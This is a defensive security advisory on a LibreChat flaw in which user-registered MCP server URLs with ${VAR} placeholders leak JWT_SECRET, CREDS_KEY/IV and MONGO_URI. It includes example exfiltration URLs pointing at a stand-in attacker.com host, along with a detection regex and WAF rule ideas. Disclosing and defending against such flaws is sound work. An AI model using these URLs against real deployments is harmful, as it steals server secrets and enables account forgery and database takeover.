Critical · CVSS 9.6 June 2, 2026 · YLChen-007 / LibreChat

LibreChat MCP Server URL Environment Variable Exfiltration

Authenticated users can weaponize ${VAR} placeholder resolution in user-supplied MCP server URLs to exfiltrate JWT_SECRET, CREDS_KEY/CREDS_IV, and MONGO_URI to an attacker-controlled domain

LibreChat versions up to and including 0.8.3 contain a critical information-disclosure flaw (CVE-2026-32625, CVSS 9.6) in its Model Context Protocol integration. Any authenticated user — no admin privileges required — can register a malicious MCP server URL containing ${JWT_SECRET}, ${CREDS_KEY}, ${CREDS_IV}, or ${MONGO_URI} placeholders. LibreChat's Zod validation resolves these against the server's own environment before connecting, transmitting the live secrets to an attacker-controlled domain. The blast radius is total: forged auth tokens, decrypted stored credentials, and direct database access. Fixed in v0.8.4-rc1, which strips env-var interpolation from user-supplied MCP URLs.

1 CVE
9.6 CVSS Score
Info Leak Class
Post-Auth Access Required

Technical Breakdown

CVE-2026-32625 Critical · CVSS 9.6 Post-Auth Server-Side Secret Exfiltration

LibreChat MCP Server URL Environment Variable Exfiltration

LibreChat's Model Context Protocol integration uses a Zod schema .transform(extractEnvVariable) that resolves ${VAR}-style placeholders in an MCP server URL against the server process's own process.env during validation. That transform was written for admin-managed YAML MCP configs, where interpolating trusted operator-supplied variable names is reasonable. The same schema, however, also validates input on POST /api/mcp/servers — a REST endpoint any authenticated user can call, admin or not. Submit a URL like http://attacker.com/?jwt=${JWT_SECRET}, and the validator resolves the live secret before LibreChat ever attempts the MCP handshake, sending it to the attacker's domain as part of connection/discovery.

CWE: CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor  |  Fixed in: 0.8.4-rc1  |  Workaround: Restrict MCP server registration to admin roles; enforce egress allowlisting; move secrets out of process.env

Root Cause

LibreChat's MCP integration uses a Zod schema .transform(extractEnvVariable) that resolves ${VAR}-style placeholders against the server process's process.env during validation of user-supplied MCP server URLs. This transform was intended only for admin-managed YAML MCP configs but was also applied to the REST API path that any authenticated user can hit, so untrusted input gets the same environment-variable substitution privilege as trusted config.

Vulnerable Pattern

A validation transform written for one trust boundary — admin-authored YAML parsed at startup — was reused verbatim on a second, lower-trust boundary — a REST endpoint any logged-in user can call. Zod's .transform() has no concept of caller identity, so it performs the same env-var interpolation regardless of who submitted the URL.

Why AI Services Are High-Value

LibreChat centralizes authentication secrets (JWT_SECRET), credential-encryption keys (CREDS_KEY/CREDS_IV), and the full database connection string (MONGO_URI) in one process's environment. That single-process concentration is exactly the blast-radius profile that makes AI chat/agent gateways a disproportionately high-value target compared to a typical web app leaking one scoped API key.

The Fix

Upgrade to v0.8.4-rc1, which strips environment-variable interpolation from user-supplied MCP server URLs — the extractEnvVariable transform is now scoped only to admin-managed YAML config parsing, never to REST API input from ordinary users.

Attack Chain

1

Recon — confirm MCP self-service is enabled

Attacker creates or authenticates a low-privilege account and probes whether the instance exposes user-facing MCP server registration rather than restricting it to admin-managed config.

Defensive note: Audit whether per-user MCP registration is active; log and alert on first-time MCP server registrations by non-admin accounts.

2

Weaponize the URL

Attacker builds a malicious MCP server URL like http://attacker.com/?jwt=${JWT_SECRET}&key=${CREDS_KEY}&iv=${CREDS_IV}&mongo=${MONGO_URI} and submits it via the authenticated MCP registration endpoint.

Defensive note: WAF/API-gateway rule flagging/blocking request bodies to MCP config endpoints containing ${ followed by uppercase env-var tokens.

3

Server-side resolution

LibreChat's Zod transform runs during validation, silently substituting placeholders with real process.env values, since the same transform used for trusted admin YAML also processes this untrusted REST input.

Defensive note: This is the code-level bug — detect via server-side logging of outbound MCP connection attempts containing resolved secret-shaped query strings.

4

Exfiltration

LibreChat's backend connects to the attacker-controlled URL as part of MCP handshake/discovery, delivering resolved secrets in the request.

Defensive note: Enforce egress allowlisting from the LibreChat host — the single most effective compensating control pre-patch.

5

Impact — full cryptographic and database compromise

With JWT_SECRET the attacker forges arbitrary session tokens; with CREDS_KEY/CREDS_IV they decrypt all stored credentials; with MONGO_URI they connect directly to the database.

Defensive note: Rotate all four secret classes and invalidate all sessions post-incident — a leaked JWT_SECRET requires full rotation and forced re-auth of every user.

Impact

Secrets baked into an LLM gateway's process environment control everything downstream — session integrity, encrypted-credential confidentiality, and the database of record. A leak here isn't contained to one feature; it collapses the platform's entire trust boundary.

Credential & Cryptographic Material Theft

  • CREDS_KEY/CREDS_IV leakage allows offline decryption of every credential LibreChat has encrypted at rest
  • JWT_SECRET leakage enables forging valid tokens for any user, including admins
  • Once JWT_SECRET/CREDS_KEY/CREDS_IV are out, patching alone doesn't remediate already-stolen secrets
  • Rotation must happen immediately post-patch — the exposure window covers every unrotated secret since first exploitation, not just future requests

Database Compromise

  • MONGO_URI exposure grants direct access to the backing MongoDB, bypassing the app layer entirely
  • Attacker can read all conversation history, user records, stored credentials, and config
  • Write access could self-grant admin status via direct database modification
  • Direct DB access bypasses application-layer audit logging, making the intrusion far harder to detect after the fact

Privilege Escalation via Low-Privilege Entry Point

  • Requires only a standard authenticated account — no admin access needed
  • Multi-tenant, open-signup, and broad-SSO deployments are especially exposed
  • Combined with forged JWTs, an unprivileged attacker escalates to full admin control
  • The entry point is the same self-service MCP registration flow legitimate users use daily, so malicious use blends into normal traffic patterns

Defensive Tutorial

IMMEDIATE · 0–24 HRS

Upgrade to LibreChat v0.8.4-rc1 or later

Immediate

Removes env-var interpolation from user-supplied MCP URLs entirely — the actual fix, not a workaround substitute.

IMMEDIATE · 0–24 HRS

Rotate all four exposed secret classes now, assuming compromise

Immediate

Regenerate JWT_SECRET, CREDS_KEY, CREDS_IV, and rotate MongoDB credentials in MONGO_URI.

IMMEDIATE · 0–24 HRS

Grep MCP registration logs/DB for placeholder-injection attempts

Immediate

Search for URLs matching \$\{[A-Z_]+\} (e.g. ${JWT_SECRET}, ${MONGO_URI}) to check for prior exploitation.

IMMEDIATE · 0–24 HRS

Disable non-admin MCP server registration if you can't patch same-day

Immediate

Restrict the endpoint to the admin role via reverse proxy/RBAC as a stopgap.

SHORT-TERM · 1–7 DAYS

Enforce egress allowlisting from the LibreChat host

Important

Firewall/NACL rules so the app can only reach explicitly approved MCP server domains.

SHORT-TERM · 1–7 DAYS

Add a WAF/API-gateway rule blocking template syntax in MCP config bodies

Important

Block ${...} template syntax in MCP config request bodies as defense-in-depth on top of the patch.

SHORT-TERM · 1–7 DAYS

Force re-authentication of all users after JWT_SECRET rotation

Important

Audit admin account activity for the exposure window for signs of forged-token misuse.

LONG-TERM

Move secrets out of process.env into a dedicated secrets manager

Important

Vault or AWS Secrets Manager, with no code path that performs generic template interpolation against it.

LONG-TERM

Require security review for trusted-path logic reused on untrusted-path endpoints

Important

Add MCP/plugin-integration endpoints to SBOM/periodic security review scope, and require review for any schema .transform()/interpolation logic shared between trusted admin config and untrusted user-facing API input — this exact pattern is the recurring root cause here.

References

  • NVD Entry CVE-2026-32625 — CVSS v3.1 vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, base score 9.6.
  • GitHub Security Advisory GHSA-4pcc-j6m6-wcwx — vendor advisory with patch details and disclosure timeline, credited to researcher YLChen-007.
  • Vendor Changelog v0.8.4-rc1 changelog — release confirming the fix.
  • CWE Reference CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor
Advisory analysis by Spectreworks AI. Original research by YLChen-007. All defensive recommendations are based on publicly available disclosure information. Verify patch applicability against your specific deployment before production changes.